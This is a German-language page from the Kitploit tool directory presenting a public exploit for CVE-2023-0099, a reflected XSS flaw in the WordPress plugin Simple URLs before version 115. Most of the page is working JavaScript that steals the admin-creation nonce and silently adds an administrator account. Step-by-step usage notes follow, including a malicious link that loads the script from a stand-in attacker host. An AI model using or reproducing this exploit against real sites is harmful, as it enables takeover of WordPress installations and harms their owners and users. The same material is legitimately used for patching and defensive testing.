Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-0099-exploit — einfache URLs < 115 - Reflected XSS | Kitploit
Tools/GitHubGitHub/amirzargham/cve-2023-0099-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

einfache URLs < 115 - Reflected XSS

Repository anzeigen
61vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-0099-exploit

Exploit Title: simple urls < 115 - Reflected XSS

Google Dork:

Exploit Author: AmirZargham

Vendor Homepage: https://getlasso.co/

Software Link: https://wordpress.org/plugins/simple-urls/

Version: < 115

Tested on: firefox,chrome

CVE: CVE-2023-0099

CWE: CWE-79

Platform: MULTIPLE

Type: WebApps

Beschreibung Das WordPress-Plugin Simple URLs in Versionen vor 115 bereinigt und maskiert einige Parameter nicht, bevor sie in bestimmten Seiten ausgegeben werden. Dies führt zu Reflected Cross-Site Scripting, das gegen Benutzer mit hohen Privilegien wie Administratoren eingesetzt werden könnte.

Exploit:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

Nutzungshinweise:

  1. Speichern Sie den Exploit-Code als JavaScript-Datei auf einem Server.
  2. Ändern Sie im Exploit-Code die Werte von:
    • user_login: Beliebiger Benutzername
    • pass1: Beliebige Passwort
    • pass2: Beliebige Passwort
    • email: Beliebige E-Mail
  3. Senden Sie dann diesen schädlichen Link an das Opfer: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. Nun wurde ein Admin-Benutzer erstellt. Gehen Sie zu /wp-admin oder ähnlich und melden Sie sich im WordPress-Panel an.

Veröffentlicht in: exploit-db.

Veröffentlicht in: 0day.today.

Veröffentlicht in: packet storm.

Tool herunterladen